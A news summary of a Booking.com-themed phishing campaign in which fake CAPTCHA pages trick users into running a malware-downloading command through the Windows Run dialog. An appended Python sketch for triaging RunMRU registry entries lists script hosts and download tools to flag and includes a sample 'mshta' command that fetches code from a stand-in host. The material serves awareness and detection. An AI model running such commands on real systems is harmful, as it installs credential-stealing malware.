The attack begins with phishing emails disguised as Booking.com communications, containing fake customer inquiries, account verifications, or promotional offers. The email directs recipients to a website mimicking Booking.com, where a fake CAPTCHA prompt appears. This verification page instructs the user to execute a command through the Windows Run dialog; running it starts the download of malware without the user realizing it. Microsoft has identified multiple malware strains in this campaign, all designed to steal financial data and credentials.
The use of a verification step adds a layer of deception, making the phishing attempt appear more legitimate. Microsoft warns that such tactics exploit human problem-solving tendencies, increasing the likelihood of victims falling for the scheme.
Booking.com has confirmed that its systems remain uncompromised but acknowledges that some of its partners and customers have been affected. The company emphasizes that it never requests payment details via email, chat, text, or phone and is actively investing in security measures to protect users.
Security experts caution that this technique, while innovative, requires a moderate level of technical proficiency from victims, potentially limiting its effectiveness. However, organizations are advised to enhance user awareness and restrict administrative privileges to mitigate risks associated with such phishing attacks.
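One way to check a host for the Run-dialog step described above, as an added example that is not from Microsoft, Booking.com or the source article: Windows keeps commands typed into the Run dialog in the per-user registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, and the sketch below triages values exported from that key. The program list, the sample entries and the function names are assumptions constructed for illustration.

```python
import re

# Assumption: programs a Run-dialog entry has little everyday reason to
# combine with a remote URL. Tune this list for your environment.
SCRIPT_HOSTS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript", "curl",
                "certutil", "bitsadmin", "msiexec", "rundll32", "regsvr32"}
URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)


def normalize(raw):
    """RunMRU data ends with the marker '\\1'; strip it and outer whitespace."""
    value = raw.strip()
    return value[:-2].rstrip() if value.endswith("\\1") else value


def program_name(command):
    """Return the lower-cased executable name without path or .exe suffix."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    if not m:
        return ""
    exe = (m.group(1) or m.group(2)).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return exe[:-4] if exe.endswith(".exe") else exe


def triage_runmru(values):
    """values: mapping of RunMRU value name -> data. Returns flagged entries."""
    findings = []
    for name, raw in values.items():
        if name.lower() == "mrulist":  # ordering string, not a command
            continue
        command = normalize(raw)
        prog = program_name(command)
        urls = URL_RE.findall(command)
        # Flag only when a script host or download utility is given a URL.
        if prog in SCRIPT_HOSTS and urls:
            findings.append({"value": name, "program": prog,
                             "urls": urls, "command": command})
    return findings


# Constructed sample export (not taken from the campaign).
SAMPLE = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://verify.example.invalid/check\\1",
}

if __name__ == "__main__":
    for f in triage_runmru(SAMPLE):
        print(f"[!] RunMRU value {f['value']}: {f['program']} -> {f['urls']}")
```

A hit is a lead for investigation, not proof of compromise; an empty result does not clear the host, since the key can be edited or cleared.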
Source: Dark Reading
The European Cyber Intelligence Forum is a nonprofit think tank specializing in intelligence and cybersecurity, offering consultancy services to government entities.